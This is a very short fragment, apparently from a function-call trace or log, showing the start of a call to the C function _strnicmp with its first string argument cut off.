_strnicmp (_Str1="